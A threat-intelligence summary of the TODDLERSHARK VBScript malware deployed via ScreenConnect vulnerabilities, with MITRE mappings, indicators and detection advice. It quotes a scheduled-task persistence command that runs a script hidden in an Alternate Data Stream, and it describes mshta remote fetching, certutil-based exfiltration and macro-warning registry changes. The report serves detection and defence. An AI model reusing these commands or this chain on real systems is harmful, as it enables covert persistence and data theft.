TODDLERSHARK: ScreenConnect Vulnerability Exploited to Deploy BABYSHARK Variant

Kroll CTI identified a VBScript-based malware family they call TODDLERSHARK, deployed after exploitation of ConnectWise ScreenConnect vulnerabilities (CVE-2024-1708 / CVE-2024-1709) and resembling the BABYSHARK toolset. The attack chain uses mshta to fetch a polymorphic VBScript that downloads a hex-encoded second stage which modifies registry macro settings, harvests system data, encodes it with certutil for exfiltration, and establishes persistence via a scheduled task hidden in an Alternate Data Stream. #TODDLERSHARK #ScreenConnect

Keypoints

Kroll CTI discovered TODDLERSHARK, a VBScript-based malware similar to BABYSHARK, used post-compromise after ScreenConnect exploitation.
Initial access exploited authentication bypass and path traversal in ScreenConnect (CVE-2024-1709 and CVE-2024-1708) to run commands on a victim host.
mshta.exe was used to download a heavily obfuscated VBScript; payloads are polymorphic with randomized names, junk code, and unique second-stage URLs, preventing stable file hashes.
The second-stage payload (hex-encoded) performs three main functions: set registry VBAWarnings keys, collect extensive system/network/security information, and create a scheduled task for periodic execution.
Stolen data is encoded into a PEM certificate via certutil and exfiltrated to a C2 web application; capture and certificate files are deleted after use.
Persistence is achieved by writing a VBScript to an Alternate Data Stream and creating a scheduled task (runs every minute) that fetches and executes responses from a unique C2 URL.
Detections recommended: flag mshta with URL args, certutil encoding, scheduled task creation (especially with ADS), and PowerShell/cmd spawning from mshta or encoded PowerShell usage.

MITRE Techniques

[T1132.001] Data Encoding – certutil was used to encode stolen data into a PEM certificate before exfiltration ( ‘certutil.exe encoding files’ ).
[T1053.005] Scheduled Task/Job – malware created a scheduled task that runs every minute to fetch and execute code from a URL stored in an Alternate Data Stream ( ‘schtasks /Create /SC minute /MO 1 /TN Uso1Cache /TR “wscript … .Uso1Config.conf:htaccess” /f’ ).
[T1218.005] Signed Binary Proxy Execution (mshta) – mshta.exe fetched and executed a remote VBScript and spawned cmd.exe to run additional commands ( ‘Detect mshta.exe executing with URL parameters’ ).
[T1027.010] Obfuscated Files or Information (PowerShell encoded) – payloads used heavy obfuscation and encoded/hex-encoded second-stage content; PowerShell encoded commands were also noted ( ‘PowerShell executing an encoded command’ ).
[T1059.003] Command and Scripting Interpreter: Windows PowerShell – PowerShell was spawned from cmd.exe for information gathering and environment queries ( ‘Detect PowerShell execution from cmd.exe’ ).

Indicators of Compromise

[File paths] capture and ADS script locations – C:ProgramData[RANDOM_STRING].acl (capture files), C:ProgramDataUso1.Uso1Config.conf:htaccess (script stored in ADS).
[Scheduled task name] persistence – Uso1Cache (schtasks entry created to run every minute).
[C2 URLs / Domains] unique hex-encoded second-stage URLs and malicious destination domain activity observed on VirusTotal – example: unique hex-encoded second-stage URL embedded in payload, and a malicious domain reported to VirusTotal (domain not listed in article).
[File hashes] polymorphic payloads – initial VBScript downloads change function/variable names and junk code so file hashes are not stable (no consistent hashes provided).

The technical procedure begins with exploitation of ConnectWise ScreenConnect (notably CVE-2024-1709 and CVE-2024-1708) to gain hands-on-keyboard access to a compromised host. The attacker uses cmd.exe to run mshta.exe with a URL that retrieves a heavily obfuscated VBScript; that initial script contains randomized function/variable names and large hex blobs and junk code so each download yields a unique file and hash. De-obfuscation reveals a second-stage payload encoded as a large hexadecimal string, and the C2 appears to generate unique second-stage URLs for each fetch.

The decoded second-stage implements three core capabilities: it writes registry keys to set VBAWarnings to 1 across multiple Office versions (broadening macro execution), it executes a series of system and network enumeration commands redirecting output to a randomly named capture file (e.g., hostname, systeminfo, net user, ipconfig, netstat, tasklist, directory listings), and it encodes the capture into a PEM certificate using certutil for exfiltration to the C2 before deleting local artifacts. The information stealer spawns multiple cmd.exe instances and uses PowerShell queries for antivirus/product information, increasing reconnaissance detail.

For persistence the malware writes a VBScript into an Alternate Data Stream and creates a scheduled task (schtasks) named Uso1Cache that runs every minute, calling wscript to execute the ADS script which requests a uniquely generated URL and passes any response to the VBScript execution engine. Because payloads are polymorphic and URLs are unique per run, detection should focus on behavioral indicators: mshta fetching remote scripts, certutil -encode usage, scheduled task creation referencing ADS, and anomalous cmd/PowerShell spawn chains. Patching affected ScreenConnect instances and hunting for these behaviors are the primary mitigations.